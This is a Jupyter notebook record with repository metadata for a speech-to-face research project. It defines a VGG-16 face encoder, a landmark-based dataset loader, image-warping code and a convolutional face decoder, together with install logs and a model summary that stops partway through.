"weights_resnet_1 = 'weights_resnet_1.h5'\nmodel.save_weights(weights_resnet_1)", "_____no_output_____" ], [ "# X = X_train[10]\n# y = model.predict(X.reshape((1, 320, 320)))\nplt.imshow(X_train[10])\nprint(utils.getLabel(root, filename, Y_train[10]))", "云D86999\n" ] ] ]
[ "code" ]
[ [ "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code" ] ]
e73002633be9611e4154984bf37f82bc4eef9f94
795,921
ipynb
Jupyter Notebook
old-notebooks/Decoder_damaged.ipynb
antoniomuso/speech2face
19faf467fd39a07725ca874afc8d8b72121d7940
[ "MIT" ]
null
null
null
old-notebooks/Decoder_damaged.ipynb
antoniomuso/speech2face
19faf467fd39a07725ca874afc8d8b72121d7940
[ "MIT" ]
1
2021-09-17T18:43:17.000Z
2021-10-03T21:39:40.000Z
old-notebooks/Decoder_damaged.ipynb
antoniomuso/speech2face
19faf467fd39a07725ca874afc8d8b72121d7940
[ "MIT" ]
null
null
null
580.117347
128,914
0.925964
[ [ [ "<a href=\"https://colab.research.google.com/github/antoniomuso/speech2face/blob/master/Decoder_damaged.ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>", "_____no_output_____" ] ], [ [ "! pip3 install face_recognition\n! pip3 install tensorflow-gpu==1.15\n\nimport numpy as np\nimport argparse\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torchvision import datasets, models, transforms\nfrom PIL import Image\nimport face_recognition\n\nPATH = \"http://www.robots.ox.ac.uk/~albanie/models/pytorch-mcn/vgg_face_dag.pth\"", "Collecting face_recognition\n Downloading https://files.pythonhosted.org/packages/1e/95/f6c9330f54ab07bfa032bf3715c12455a381083125d8880c43cbe76bb3d0/face_recognition-1.3.0-py2.py3-none-any.whl\nRequirement already satisfied: Click>=6.0 in /usr/local/lib/python3.6/dist-packages (from face_recognition) (7.1.2)\nRequirement already satisfied: dlib>=19.7 in /usr/local/lib/python3.6/dist-packages (from face_recognition) (19.18.0)\nRequirement already satisfied: Pillow in /usr/local/lib/python3.6/dist-packages (from face_recognition) (7.0.0)\nRequirement already satisfied: numpy in /usr/local/lib/python3.6/dist-packages (from face_recognition) (1.18.5)\nCollecting face-recognition-models>=0.3.0\n\u001b[?25l Downloading https://files.pythonhosted.org/packages/cf/3b/4fd8c534f6c0d1b80ce0973d01331525538045084c73c153ee6df20224cf/face_recognition_models-0.3.0.tar.gz (100.1MB)\n\u001b[K |████████████████████████████████| 100.2MB 106kB/s \n\u001b[?25hBuilding wheels for collected packages: face-recognition-models\n Building wheel for face-recognition-models (setup.py) ... \u001b[?25l\u001b[?25hdone\n Created wheel for face-recognition-models: filename=face_recognition_models-0.3.0-py2.py3-none-any.whl size=100566172 sha256=67b88dced0a76683181a4b88a3c32597e64b711a8bbe5299329077103a3a7c09\n Stored in directory: /root/.cache/pip/wheels/d2/99/18/59c6c8f01e39810415c0e63f5bede7d83dfb0ffc039865465f\nSuccessfully built face-recognition-models\nInstalling collected packages: face-recognition-models, face-recognition\nSuccessfully installed face-recognition-1.3.0 face-recognition-models-0.3.0\nCollecting tensorflow-gpu==1.15\n\u001b[?25l Downloading https://files.pythonhosted.org/packages/a5/ad/933140e74973fb917a194ab814785e7c23680ca5dee6d663a509fe9579b6/tensorflow_gpu-1.15.0-cp36-cp36m-manylinux2010_x86_64.whl (411.5MB)\n\u001b[K |████████████████████████████████| 411.5MB 40kB/s \n\u001b[?25hRequirement already satisfied: wrapt>=1.11.1 in /usr/local/lib/python3.6/dist-packages (from tensorflow-gpu==1.15) (1.12.1)\nCollecting gast==0.2.2\n Downloading https://files.pythonhosted.org/packages/4e/35/11749bf99b2d4e3cceb4d55ca22590b0d7c2c62b9de38ac4a4a7f4687421/gast-0.2.2.tar.gz\nRequirement already satisfied: astor>=0.6.0 in /usr/local/lib/python3.6/dist-packages (from tensorflow-gpu==1.15) (0.8.1)\nRequirement already satisfied: absl-py>=0.7.0 in /usr/local/lib/python3.6/dist-packages (from tensorflow-gpu==1.15) (0.9.0)\nCollecting tensorflow-estimator==1.15.1\n\u001b[?25l Downloading https://files.pythonhosted.org/packages/de/62/2ee9cd74c9fa2fa450877847ba560b260f5d0fb70ee0595203082dafcc9d/tensorflow_estimator-1.15.1-py2.py3-none-any.whl (503kB)\n\u001b[K |████████████████████████████████| 512kB 46.3MB/s \n\u001b[?25hRequirement already satisfied: wheel>=0.26 in /usr/local/lib/python3.6/dist-packages (from tensorflow-gpu==1.15) (0.34.2)\nRequirement already satisfied: keras-preprocessing>=1.0.5 in /usr/local/lib/python3.6/dist-packages (from tensorflow-gpu==1.15) (1.1.2)\nCollecting keras-applications>=1.0.8\n\u001b[?25l Downloading https://files.pythonhosted.org/packages/71/e3/19762fdfc62877ae9102edf6342d71b28fbfd9dea3d2f96a882ce099b03f/Keras_Applications-1.0.8-py3-none-any.whl (50kB)\n\u001b[K |████████████████████████████████| 51kB 9.5MB/s \n\u001b[?25hCollecting tensorboard<1.16.0,>=1.15.0\n\u001b[?25l Downloading https://files.pythonhosted.org/packages/1e/e9/d3d747a97f7188f48aa5eda486907f3b345cd409f0a0850468ba867db246/tensorboard-1.15.0-py3-none-any.whl (3.8MB)\n\u001b[K |████████████████████████████████| 3.8MB 49.3MB/s \n\u001b[?25hRequirement already satisfied: grpcio>=1.8.6 in /usr/local/lib/python3.6/dist-packages (from tensorflow-gpu==1.15) (1.31.0)\nRequirement already satisfied: protobuf>=3.6.1 in /usr/local/lib/python3.6/dist-packages (from tensorflow-gpu==1.15) (3.12.4)\nRequirement already satisfied: termcolor>=1.1.0 in /usr/local/lib/python3.6/dist-packages (from tensorflow-gpu==1.15) (1.1.0)\nRequirement already satisfied: numpy<2.0,>=1.16.0 in /usr/local/lib/python3.6/dist-packages (from tensorflow-gpu==1.15) (1.18.5)\nRequirement already satisfied: six>=1.10.0 in /usr/local/lib/python3.6/dist-packages (from tensorflow-gpu==1.15) (1.15.0)\nRequirement already satisfied: google-pasta>=0.1.6 in /usr/local/lib/python3.6/dist-packages (from tensorflow-gpu==1.15) (0.2.0)\nRequirement already satisfied: opt-einsum>=2.3.2 in /usr/local/lib/python3.6/dist-packages (from tensorflow-gpu==1.15) (3.3.0)\nRequirement already satisfied: h5py in /usr/local/lib/python3.6/dist-packages (from keras-applications>=1.0.8->tensorflow-gpu==1.15) (2.10.0)\nRequirement already satisfied: werkzeug>=0.11.15 in /usr/local/lib/python3.6/dist-packages (from tensorboard<1.16.0,>=1.15.0->tensorflow-gpu==1.15) (1.0.1)\nRequirement already satisfied: markdown>=2.6.8 in /usr/local/lib/python3.6/dist-packages (from tensorboard<1.16.0,>=1.15.0->tensorflow-gpu==1.15) (3.2.2)\nRequirement already satisfied: setuptools>=41.0.0 in /usr/local/lib/python3.6/dist-packages (from tensorboard<1.16.0,>=1.15.0->tensorflow-gpu==1.15) (49.2.0)\nRequirement already satisfied: importlib-metadata; python_version < \"3.8\" in /usr/local/lib/python3.6/dist-packages (from markdown>=2.6.8->tensorboard<1.16.0,>=1.15.0->tensorflow-gpu==1.15) (1.7.0)\nRequirement already satisfied: zipp>=0.5 in /usr/local/lib/python3.6/dist-packages (from importlib-metadata; python_version < \"3.8\"->markdown>=2.6.8->tensorboard<1.16.0,>=1.15.0->tensorflow-gpu==1.15) (3.1.0)\nBuilding wheels for collected packages: gast\n Building wheel for gast (setup.py) ... \u001b[?25l\u001b[?25hdone\n Created wheel for gast: filename=gast-0.2.2-cp36-none-any.whl size=7540 sha256=ba60ca4a340916df06d4fed0fd7aa44891b496c279bc6884cf714366808bafc9\n Stored in directory: /root/.cache/pip/wheels/5c/2e/7e/a1d4d4fcebe6c381f378ce7743a3ced3699feb89bcfbdadadd\nSuccessfully built gast\n\u001b[31mERROR: tensorflow 2.3.0 has requirement gast==0.3.3, but you'll have gast 0.2.2 which is incompatible.\u001b[0m\n\u001b[31mERROR: tensorflow 2.3.0 has requirement tensorboard<3,>=2.3.0, but you'll have tensorboard 1.15.0 which is incompatible.\u001b[0m\n\u001b[31mERROR: tensorflow 2.3.0 has requirement tensorflow-estimator<2.4.0,>=2.3.0, but you'll have tensorflow-estimator 1.15.1 which is incompatible.\u001b[0m\n\u001b[31mERROR: tensorflow-probability 0.11.0 has requirement gast>=0.3.2, but you'll have gast 0.2.2 which is incompatible.\u001b[0m\nInstalling collected packages: gast, tensorflow-estimator, keras-applications, tensorboard, tensorflow-gpu\n Found existing installation: gast 0.3.3\n Uninstalling gast-0.3.3:\n Successfully uninstalled gast-0.3.3\n Found existing installation: tensorflow-estimator 2.3.0\n Uninstalling tensorflow-estimator-2.3.0:\n Successfully uninstalled tensorflow-estimator-2.3.0\n Found existing installation: tensorboard 2.3.0\n Uninstalling tensorboard-2.3.0:\n Successfully uninstalled tensorboard-2.3.0\nSuccessfully installed gast-0.2.2 keras-applications-1.0.8 tensorboard-1.15.0 tensorflow-estimator-1.15.1 tensorflow-gpu-1.15.0\n" ], [ "from google.colab import drive\ndrive.mount('/content/drive')", "Go to this URL in a browser: https://accounts.google.com/o/oauth2/auth?client_id=947318989803-6bn6qk8qdgf4n4g3pfee6491hc0brc4i.apps.googleusercontent.com&redirect_uri=urn%3aietf%3awg%3aoauth%3a2.0%3aoob&scope=email%20https%3a%2f%2fwww.googleapis.com%2fauth%2fdocs.test%20https%3a%2f%2fwww.googleapis.com%2fauth%2fdrive%20https%3a%2f%2fwww.googleapis.com%2fauth%2fdrive.photos.readonly%20https%3a%2f%2fwww.googleapis.com%2fauth%2fpeopleapi.readonly&response_type=code\n\nEnter your authorization code:\n··········\nMounted at /content/drive\n" ], [ "# Download Dataset\n# Test Set\n# ! wget -x --load-cookies \"/content/drive/My Drive/Speech2Face/cookies.txt\" -O \"/content/drive/My Drive/Speech2Face/vggface2_test.tar.gz\" http://zeus.robots.ox.ac.uk/vgg_face2/get_file?fname=vggface2_test.tar.gz\n\n#! tar -zxvf \"/content/drive/My Drive/Speech2Face/vggface2_test.tar.gz\" -C \"/content/drive/My Drive/Speech2Face/data_test\"\n# Training Set \n# ! wget -x --load-cookies \"/content/drive/My Drive/Speech2Face/cookies.txt\" -O \"/content/drive/My Drive/Speech2Face/vggface2_test.tar.gz\" http://zeus.robots.ox.ac.uk/vgg_face2/get_file?fname=vggface2_test.tar.gz", "_____no_output_____" ], [ "#VGG-16 Face Encoder Class\n! pip install torchfile\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torchfile\n\n\n\nclass VGG_16(nn.Module):\n \"\"\"\n Main Class\n \"\"\"\n\n def __init__(self):\n \"\"\"\n Constructor\n \"\"\"\n super().__init__()\n self.block_size = [2, 2, 3, 3, 3]\n self.conv_1_1 = nn.Conv2d(3, 64, 3, stride=1, padding=1)\n self.conv_1_2 = nn.Conv2d(64, 64, 3, stride=1, padding=1)\n self.conv_2_1 = nn.Conv2d(64, 128, 3, stride=1, padding=1)\n self.conv_2_2 = nn.Conv2d(128, 128, 3, stride=1, padding=1)\n self.conv_3_1 = nn.Conv2d(128, 256, 3, stride=1, padding=1)\n self.conv_3_2 = nn.Conv2d(256, 256, 3, stride=1, padding=1)\n self.conv_3_3 = nn.Conv2d(256, 256, 3, stride=1, padding=1)\n self.conv_4_1 = nn.Conv2d(256, 512, 3, stride=1, padding=1)\n self.conv_4_2 = nn.Conv2d(512, 512, 3, stride=1, padding=1)\n self.conv_4_3 = nn.Conv2d(512, 512, 3, stride=1, padding=1)\n self.conv_5_1 = nn.Conv2d(512, 512, 3, stride=1, padding=1)\n self.conv_5_2 = nn.Conv2d(512, 512, 3, stride=1, padding=1)\n self.conv_5_3 = nn.Conv2d(512, 512, 3, stride=1, padding=1)\n self.fc6 = nn.Linear(512 * 7 * 7, 4096)\n self.fc7 = nn.Linear(4096, 4096)\n self.fc8 = nn.Linear(4096, 2622)\n\n def load_weights(self, path=\"/content/drive/My Drive/Speech2Face/alt/vgg_weights/vgg_face_torch/VGG_FACE.t7\"):\n\n \"\"\" Function to load luatorch pretrained\n Args:\n path: path for the luatorch pretrained\n \"\"\"\n model = torchfile.load(path)\n counter = 1\n block = 1\n for i, layer in enumerate(model.modules):\n if layer.weight is not None:\n if block <= 5:\n self_layer = getattr(self, \"conv_%d_%d\" % (block, counter))\n counter += 1\n if counter > self.block_size[block - 1]:\n counter = 1\n block += 1\n self_layer.weight.data[...] = torch.tensor(layer.weight).view_as(self_layer.weight)[...]\n self_layer.bias.data[...] = torch.tensor(layer.bias).view_as(self_layer.bias)[...]\n else:\n self_layer = getattr(self, \"fc%d\" % (block))\n block += 1\n self_layer.weight.data[...] = torch.tensor(layer.weight).view_as(self_layer.weight)[...]\n self_layer.bias.data[...] = torch.tensor(layer.bias).view_as(self_layer.bias)[...]\n\n def forward(self, x):\n \"\"\" Pytorch forward\n Args:\n x: input image (224x224)\n Returns: class logits\n \"\"\"\n x = F.relu(self.conv_1_1(x))\n x = F.relu(self.conv_1_2(x))\n x = F.max_pool2d(x, 2, 2)\n x = F.relu(self.conv_2_1(x))\n x = F.relu(self.conv_2_2(x))\n x = F.max_pool2d(x, 2, 2)\n x = F.relu(self.conv_3_1(x))\n x = F.relu(self.conv_3_2(x))\n x = F.relu(self.conv_3_3(x))\n x = F.max_pool2d(x, 2, 2)\n x = F.relu(self.conv_4_1(x))\n x = F.relu(self.conv_4_2(x))\n x = F.relu(self.conv_4_3(x))\n x = F.max_pool2d(x, 2, 2)\n x = F.relu(self.conv_5_1(x))\n x = F.relu(self.conv_5_2(x))\n x = F.relu(self.conv_5_3(x))\n x = F.max_pool2d(x, 2, 2)\n x = x.view(x.size(0), -1)\n x = F.relu(self.fc6(x))\n x = F.dropout(x, 0.5, self.training)\n #return self.fc7(x) #new added\n #return F.relu(self.fc7(x))\n\n x = F.relu(self.fc7(x))\n x = F.dropout(x, 0.5, self.training)\n\n x = F.normalize(x, p=2, dim=1)\n return x\n\n #return self.fc8(x) \n\n\n def forward_two(self, x):\n \"\"\" Pytorch forward\n Args:\n x: input image (224x224)\n Returns: class logits\n \"\"\"\n x = F.relu(self.conv_1_1(x))\n x = F.relu(self.conv_1_2(x))\n x = F.max_pool2d(x, 2, 2)\n x = F.relu(self.conv_2_1(x))\n x = F.relu(self.conv_2_2(x))\n x = F.max_pool2d(x, 2, 2)\n x = F.relu(self.conv_3_1(x))\n x = F.relu(self.conv_3_2(x))\n x = F.relu(self.conv_3_3(x))\n x = F.max_pool2d(x, 2, 2)\n x = F.relu(self.conv_4_1(x))\n x = F.relu(self.conv_4_2(x))\n x = F.relu(self.conv_4_3(x))\n x = F.max_pool2d(x, 2, 2)\n x = F.relu(self.conv_5_1(x))\n x = F.relu(self.conv_5_2(x))\n x = F.relu(self.conv_5_3(x))\n x = F.max_pool2d(x, 2, 2)\n x = x.view(x.size(0), -1)\n x = F.relu(self.fc6(x))\n x = F.dropout(x, 0.5, self.training)\n x = F.relu(self.fc7(x))\n x = F.dropout(x, 0.5, self.training)\n return self.fc8(x)", "Collecting torchfile\n Downloading https://files.pythonhosted.org/packages/91/af/5b305f86f2d218091af657ddb53f984ecbd9518ca9fe8ef4103a007252c9/torchfile-0.1.0.tar.gz\nBuilding wheels for collected packages: torchfile\n Building wheel for torchfile (setup.py) ... \u001b[?25l\u001b[?25hdone\n Created wheel for torchfile: filename=torchfile-0.1.0-cp36-none-any.whl size=5712 sha256=61018a8cdc0fa54c1195cc1d4cca77c36ed8ade8b54df0cb482f08e370ff40f6\n Stored in directory: /root/.cache/pip/wheels/b1/c3/d6/9a1cc8f3a99a0fc1124cae20153f36af59a6e683daca0a0814\nSuccessfully built torchfile\nInstalling collected packages: torchfile\nSuccessfully installed torchfile-0.1.0\n" ] ], [ [ "# Dataloader\n", "_____no_output_____" ] ], [ [ "from os.path import join\nimport torch\nimport numpy as np\nfrom torch.utils.data import Dataset, DataLoader\nimport cv2\nfrom time import time\nimport face_recognition\nfrom random import randint\nfrom google.colab.patches import cv2_imshow\n\nclass Decoder_Dataset(Dataset):\n \n\n def __init__(self, Folder, VggL, sample, dev = \"cuda\"):\n\n self.root = Folder\n self.dev = dev \n self.names = os.listdir(self.root) \n self.sample = sample if sample < 20 else 20\n self.a_length = len(os.listdir(self.root)) \n self.length = self.a_length * self.sample\n self.img_name = self.root + \"{}.jpg\"\n self.vgg_features = VggL\n \n print(self.a_length)\n\n def image_out(self,path, mean =[0.485, 0.456, 0.406] , std = [0.229, 0.224, 0.225]):#[0.485, 0.456, 0.406]\n #img = cv2.cvtColor(cv2.imread(path), cv2.COLOR_BGR2RGB)\n img = Image.open(path)\n count = 0\n resultant = []\n try:\n np_image = np.asarray(img.convert('RGB'))\n faceLocation = face_recognition.face_locations(np_image)[count]\n x,y1,x1,y = faceLocation\n np_image = np_image[x:x1,y:y1]\n landmark = face_recognition.face_landmarks(np_image)\n for i in list(landmark[0].keys()):\n resultant += landmark[0][i]\n landmark = np.ravel(np.array(resultant))\n img = img.resize((224,224))\n # img = cv2.resize(img, (224,224), interpolation = cv2.INTER_AREA)\n \n preprocess = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize(mean=mean, std=std),\n ])\n img = preprocess(img)\n \n \n \n # loader = transforms.Compose([ transforms.Normalize(mean, std) ])\n # img = loader(img)\n # p = np.reshape((img.numpy() * 255), (224, 224, 3))\n # cv2_imshow(p)\n \n \n except IndexError:\n return None, None\n \n \n return img.reshape(1,224,224,3), torch.tensor(landmark)\n\n\n\n def pseudo_idx(self,idx):\n if idx < self.a_length:\n return idx\n else:\n ## return self.pseudo_idx(idx - self.a_length) ## RECURSION\n return idx // self.sample \n\n def __len__(self):\n return self.length\n\n def __getitem__(self, idx):\n\n if torch.is_tensor(idx):\n idx = idx.tolist()\n\n while True:\n index = idx\n index = self.pseudo_idx(index)\n name = index \n path = self.img_name.format(name)\n # print(path)\n\n if not os.path.exists(path):\n idx = randint(0, self.a_length) # IF FILE PATH DOESNOT EXISTS\n continue\n\n image, landmark= self.image_out(path)\n if image is None:\n idx = randint(0, self.a_length) # IF FILE PATH DOESNOT EXISTS\n continue\n\n image = image.view(3,224,224).float()\n return image, landmark.float()", "_____no_output_____" ], [ "############### THIS CELL IS COPIED FROM DEEP SPEECH MOZILLA #########################\n\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport tensorflow as tf\nimport tensorflow.compat.v1 as tfv1\nfrom tensorflow.compat import dimension_value\nfrom tensorflow.contrib.image import dense_image_warp\nfrom tensorflow.contrib.image import interpolate_spline\n\nfrom tensorflow.python.framework import ops\nfrom tensorflow.python.ops import array_ops\n\ndef _to_float32(value):\n return tf.cast(value, tf.float32)\n\ndef _to_int32(value):\n return tf.cast(value, tf.int32)\n\ndef _get_grid_locations(image_height, image_width):\n \"\"\"Wrapper for np.meshgrid.\"\"\"\n tfv1.assert_type(image_height, tf.int32)\n tfv1.assert_type(image_width, tf.int32)\n\n y_range = tf.range(image_height)\n x_range = tf.range(image_width)\n y_grid, x_grid = tf.meshgrid(y_range, x_range, indexing='ij')\n return tf.stack((y_grid, x_grid), -1)\n\n\ndef _expand_to_minibatch(tensor, batch_size):\n \"\"\"Tile arbitrarily-sized np_array to include new batch dimension.\"\"\"\n ndim = tf.size(tf.shape(tensor))\n ones = tf.ones((ndim,), tf.int32)\n\n tiles = tf.concat(([batch_size], ones), 0)\n return tf.tile(tf.expand_dims(tensor, 0), tiles)\n\n\ndef _get_boundary_locations(image_height, image_width, num_points_per_edge):\n \"\"\"Compute evenly-spaced indices along edge of image.\"\"\"\n image_height_end = _to_float32(tf.math.subtract(image_height, 1))\n image_width_end = _to_float32(tf.math.subtract(image_width, 1))\n y_range = tf.linspace(0.0, image_height_end, num_points_per_edge + 2)\n x_range = tf.linspace(0.0, image_height_end, num_points_per_edge + 2)\n ys, xs = tf.meshgrid(y_range, x_range, indexing='ij')\n is_boundary = tf.logical_or(\n tf.logical_or(tf.equal(xs, 0.0), tf.equal(xs, image_width_end)),\n tf.logical_or(tf.equal(ys, 0.0), tf.equal(ys, image_height_end)))\n return tf.stack([tf.boolean_mask(ys, is_boundary), tf.boolean_mask(xs, is_boundary)], axis=-1)\n\n\ndef _add_zero_flow_controls_at_boundary(control_point_locations,\n control_point_flows, image_height,\n image_width, boundary_points_per_edge):\n \"\"\"Add control points for zero-flow boundary conditions.\n Augment the set of control points with extra points on the\n boundary of the image that have zero flow.\n Args:\n control_point_locations: input control points\n control_point_flows: their flows\n image_height: image height\n image_width: image width\n boundary_points_per_edge: number of points to add in the middle of each\n edge (not including the corners).\n The total number of points added is\n 4 + 4*(boundary_points_per_edge).\n Returns:\n merged_control_point_locations: augmented set of control point locations\n merged_control_point_flows: augmented set of control point flows\n \"\"\"\n\n batch_size = dimension_value(tf.shape(control_point_locations)[0])\n\n boundary_point_locations = _get_boundary_locations(image_height, image_width,\n boundary_points_per_edge)\n boundary_point_shape = tf.shape(boundary_point_locations)\n boundary_point_flows = tf.zeros([boundary_point_shape[0], 2])\n\n minbatch_locations = _expand_to_minibatch(boundary_point_locations, batch_size)\n type_to_use = control_point_locations.dtype\n boundary_point_locations = tf.cast(minbatch_locations, type_to_use)\n\n minbatch_flows = _expand_to_minibatch(boundary_point_flows, batch_size)\n\n boundary_point_flows = tf.cast(minbatch_flows, type_to_use)\n\n merged_control_point_locations = tf.concat(\n [control_point_locations, boundary_point_locations], 1)\n\n merged_control_point_flows = tf.concat(\n [control_point_flows, boundary_point_flows], 1)\n\n return merged_control_point_locations, merged_control_point_flows\n\n\ndef sparse_image_warp(image,\n source_control_point_locations,\n dest_control_point_locations,\n interpolation_order=2,\n regularization_weight=0.0,\n num_boundary_points=0,\n name='sparse_image_warp'):\n \"\"\"Image warping using correspondences between sparse control points.\n Apply a non-linear warp to the image, where the warp is specified by\n the source and destination locations of a (potentially small) number of\n control points. First, we use a polyharmonic spline\n (`tf.contrib.image.interpolate_spline`) to interpolate the displacements\n between the corresponding control points to a dense flow field.\n Then, we warp the image using this dense flow field\n (`tf.contrib.image.dense_image_warp`).\n Let t index our control points. For regularization_weight=0, we have:\n warped_image[b, dest_control_point_locations[b, t, 0],\n dest_control_point_locations[b, t, 1], :] =\n image[b, source_control_point_locations[b, t, 0],\n source_control_point_locations[b, t, 1], :].\n For regularization_weight > 0, this condition is met approximately, since\n regularized interpolation trades off smoothness of the interpolant vs.\n reconstruction of the interpolant at the control points.\n See `tf.contrib.image.interpolate_spline` for further documentation of the\n interpolation_order and regularization_weight arguments.\n Args:\n image: `[batch, height, width, channels]` float `Tensor`\n source_control_point_locations: `[batch, num_control_points, 2]` float\n `Tensor`\n dest_control_point_locations: `[batch, num_control_points, 2]` float\n `Tensor`\n interpolation_order: polynomial order used by the spline interpolation\n regularization_weight: weight on smoothness regularizer in interpolation\n num_boundary_points: How many zero-flow boundary points to include at\n each image edge.Usage:\n num_boundary_points=0: don't add zero-flow points\n num_boundary_points=1: 4 corners of the image\n num_boundary_points=2: 4 corners and one in the middle of each edge\n (8 points total)\n num_boundary_points=n: 4 corners and n-1 along each edge\n name: A name for the operation (optional).\n Note that image and offsets can be of type tf.half, tf.float32, or\n tf.float64, and do not necessarily have to be the same type.\n Returns:\n warped_image: `[batch, height, width, channels]` float `Tensor` with same\n type as input image.\n flow_field: `[batch, height, width, 2]` float `Tensor` containing the dense\n flow field produced by the interpolation.\n \"\"\"\n\n image = ops.convert_to_tensor(image)\n source_control_point_locations = ops.convert_to_tensor(\n source_control_point_locations)\n dest_control_point_locations = ops.convert_to_tensor(\n dest_control_point_locations)\n\n control_point_flows = (\n dest_control_point_locations - source_control_point_locations)\n\n clamp_boundaries = num_boundary_points > 0\n boundary_points_per_edge = num_boundary_points - 1\n\n with ops.name_scope(name):\n image_shape = tf.shape(image)\n batch_size, image_height, image_width = image_shape[0], image_shape[1], image_shape[2]\n\n # This generates the dense locations where the interpolant\n # will be evaluated.\n grid_locations = _get_grid_locations(image_height, image_width)\n\n flattened_grid_locations = tf.reshape(grid_locations,\n [tf.multiply(image_height, image_width), 2])\n\n # flattened_grid_locations = constant_op.constant(\n # _expand_to_minibatch(flattened_grid_locations, batch_size), image.dtype)\n flattened_grid_locations = _expand_to_minibatch(flattened_grid_locations, batch_size)\n flattened_grid_locations = tf.cast(flattened_grid_locations, dtype=image.dtype)\n\n if clamp_boundaries:\n (dest_control_point_locations,\n control_point_flows) = _add_zero_flow_controls_at_boundary(\n dest_control_point_locations, control_point_flows, image_height,\n image_width, boundary_points_per_edge)\n\n flattened_flows = interpolate_spline(\n dest_control_point_locations, control_point_flows,\n flattened_grid_locations, interpolation_order, regularization_weight)\n\n dense_flows = array_ops.reshape(flattened_flows,\n [batch_size, image_height, image_width, 2])\n\n warped_image = dense_image_warp(image, dense_flows)\n\n return warped_image, dense_flows", "_____no_output_____" ], [ "def image_warping(src_img, src_landmarks, dest_landmarks):\n # expanded_src_landmarks = np.expand_dims(np.float32(src_landmarks), axis=0)\n # expanded_dest_landmarks = np.expand_dims(np.float32(dest_landmarks), axis=0)\n # expanded_src_img = np.expand_dims(np.float32(src_img) / 255, axis=0)\n\n warped_img, dense_flows = sparse_image_warp(src_img,\n src_landmarks,\n dest_landmarks,\n interpolation_order=1,\n regularization_weight=0.1,\n num_boundary_points=2,\n name='sparse_image_warp')\n\n with tf.Session() as sess:\n out_img = sess.run(warped_img)\n warp_img = np.uint8(out_img[:, :, :, :] * 255)\n \n return warp_img\n \ndef face_landmark(img):\n X = np.zeros((img.shape[0], 72 ,2))\n flag = []\n for i in range(img.shape[0]):\n\n landmark = face_recognition.face_landmarks(img[i].reshape(224,224,3))\n resultant = []\n try:\n for j in list(landmark[0].keys()):\n resultant += landmark[0][j] \n except IndexError:\n flag.append(i)\n continue\n X[i] = np.array(resultant)\n return X, flag", "_____no_output_____" ], [ "import torch \nfrom torch import nn\n\nclass DECODER(nn.Module):\n def __init__(self, phase):\n super(DECODER, self).__init__()\n self.phase = phase\n self.fc3 = nn.Linear(4096, 1000)\n self.ReLU = nn.ReLU()\n #self.fc_bn3 = nn.BatchNorm1d(1000)\n\n\n self.fc4 = nn.Linear(1000, 14 * 14 * 256)\n self.fc_bn4 = nn.BatchNorm1d(14 * 14 * 256)\n def TransConv( i, kernal = 5, stride = 2, inp = None):\n if not inp:\n inp = max(256//2**(i-1), 32)\n\n layer = nn.Sequential(\n nn.ConvTranspose2d(inp, max(256//2**i, 32), \n kernal, stride=stride, padding=2, output_padding=1, \n dilation=1, padding_mode='zeros'),\n nn.ReLU(),\n nn.BatchNorm2d(max(256//2**i, 32)))\n return layer\n self.T1_ = TransConv(1, inp = 256)\n self.T2_ = TransConv(2)\n self.T3_ = TransConv(3)\n self.T4_ = TransConv(4)\n \n self.ConvLast = nn.Sequential(\n nn.Conv2d(32, 3, (1,1), stride=1),\n nn.BatchNorm2d(3),\n nn.ReLU())\n\n\n self.layerLandmark1 = nn.Linear(1000, 800)\n self.layerLandmark2 = nn.Linear(800, 600)\n self.layerLandmark3 = nn.Linear(600, 400)\n self.layerLandmark4 = nn.Linear(400, 200)\n self.layerLandmark5 = nn.Linear(200, 144)\n\n\n\n\n\n \n\n\n def forward(self, x):\n L1 = self.fc3(x)\n L1 = self.ReLU(L1)\n\n\n L2 = self.layerLandmark1(L1)\n L2 = self.ReLU(L2)\n\n L3 = self.layerLandmark2(L2)\n L3 = self.ReLU(L3)\n\n L4 = self.layerLandmark3(L3)\n L4 = self.ReLU(L4)\n\n L5 = self.layerLandmark4(L4)\n L5 = self.ReLU(L5)\n\n L6 = self.layerLandmark5(L5)\n outL = self.ReLU(L6)\n\n\n # B1 = self.fc_bn3(L1) \n T0 = self.fc4(L1) \n T0 = self.ReLU(T0)\n # T0 = self.fc_bn4(T0)\n T0 = T0.view(-1,256,14,14)\n\n\n\n T1 = self.T1_(T0)\n T2 = self.T2_(T1)\n T3 = self.T3_(T2)\n T4 = self.T4_(T3)\n\n outT = self.ConvLast(T4)\n if self.phase == \"train\":\n return outL, outT \n elif self.phase == \"eval\":\n img = outT.cpu().detach().numpy().reshape(-1, 224, 224, 3)*255\n outL = outL.cpu().detach().numpy()\n outL = np.dstack((outL[:,0::2],outL[:,1::2]))\n #print(\"land np img np \", outL_.shape, img_.shape)\n img = (img.reshape(-1,224,224,3)*255).astype(np.uint8)\n #print(\"img_t \",img_t.shape, img_t[0])\n src, flag = face_landmark(img)\n if flag:\n for r in flag:\n src[r] = outL[r]\n\n return image_warping(img.astype(np.float32), src.astype(np.float32), outL.astype(np.float32))\n\n \n # outN = outT.numpy()\n # outLN = outL.numpy()\n # src, flag = face_landmark(outN)\n # if flag:\n # for r in flag:\n # src[r] = outLN[r]\n \n # IMG = torch.from_numpy(image_warping(outN, src, outLN))\n \n # if self.phase == \"train\":\n # return outL, outT , VGGL(IMG)\n # if self.phase == \"test\":\n # return IMG", "_____no_output_____" ], [ "\nfrom torchsummary import summary\ndevice = \"cuda\" #torch.device('cuda' if torch.cuda.is_available() else 'cpu')\nmodel = DECODER(\"train\")\nmodel = model.cuda()\nsummary(model, input_size=(4096,))", "----------------------------------------------------------------\n Layer (type) Output Shape Param #\n================================================================\n Linear-1 [-1, 1000] 4,097,000\n ReLU-2 [-1, 1000] 0\n Linear-3 [-1, 800] 800,800\n ReLU-4 [-1, 800] 0\n Linear-5 [-1, 600] 480,600\n ReLU-6 [-1, 600] 0\n Linear-7 [-1, 400] 240,400\n ReLU-8 [-1, 400] 0\n Linear-9 [-1, 200] 80,200\n ReLU-10 [-1, 200] 0\n Linear-11 [-1, 144] 28,944\n ReLU-12 [-1, 144] 0\n Linear-13 [-1, 50176] 50,226,176\n ReLU-14 [-1, 50176] 0\n 